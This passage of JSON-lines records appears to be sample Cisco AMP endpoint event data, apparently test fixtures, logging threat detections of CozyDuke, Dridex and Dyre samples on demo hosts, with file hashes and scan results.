Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295052","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":762000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295051","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":757000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295050","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":711000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"},"parent":{"process_id":3052,"disposition":"Malicious","file_name":"monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900023001000,"timestamp":1610704869,"timestamp_nanoseconds":23000000,"date":"2021-01-15T10:01:09+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704869,"start_date":"2021-01-15T10:01:09+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292782194426000,"timestamp":1610704867,"timestamp_nanoseconds":497000000,"date":"2021-01-15T10:01:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292782194425864","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156208033899741000,"timestamp":1610704866,"timestamp_nanoseconds":800000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156208033899741198","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":500000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6156292777899458567","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":82000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292773604491269","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":51000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491268","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292773604491000,"timestamp":1610704865,"timestamp_nanoseconds":708000000,"date":"2021-01-15T10:01:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491267","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292773604491000,"timestamp":1610704865,"timestamp_nanoseconds":427000000,"date":"2021-01-15T10:01:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491266","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"},"parent":{"process_id":3660,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156208003834970000,"timestamp":1610704859,"timestamp_nanoseconds":47000000,"date":"2021-01-15T10:00:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156208003834970125","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292743539720000,"timestamp":1610704858,"timestamp_nanoseconds":969000000,"date":"2021-01-15T10:00:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292734949785601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"},"parent":{"process_id":3660,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254780868919000,"timestamp":1610704856,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:00:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254780868919310","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832363247763718000,"timestamp":1610704849,"timestamp_nanoseconds":734000000,"date":"2021-01-15T10:00:49+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2457,"scanned_processes":40,"scanned_paths":0,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254733624279000,"timestamp":1610704845,"timestamp_nanoseconds":320000000,"date":"2021-01-15T10:00:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254733624279053","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207939410461000,"timestamp":1610704844,"timestamp_nanoseconds":773000000,"date":"2021-01-15T10:00:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207939410460684","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832265962459496000,"timestamp":1610704840,"timestamp_nanoseconds":622000000,"date":"2021-01-15T10:00:40+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1460,"scanned_processes":24,"scanned_paths":0,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532892466943623000,"timestamp":1610704839,"timestamp_nanoseconds":336000000,"date":"2021-01-15T10:00:39+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2280,"scanned_processes":41,"scanned_paths":0,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207909345690000,"timestamp":1610704837,"timestamp_nanoseconds":4000000,"date":"2021-01-15T10:00:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207909345689611","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899987000600,"timestamp":1610704833,"timestamp_nanoseconds":987000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Executed 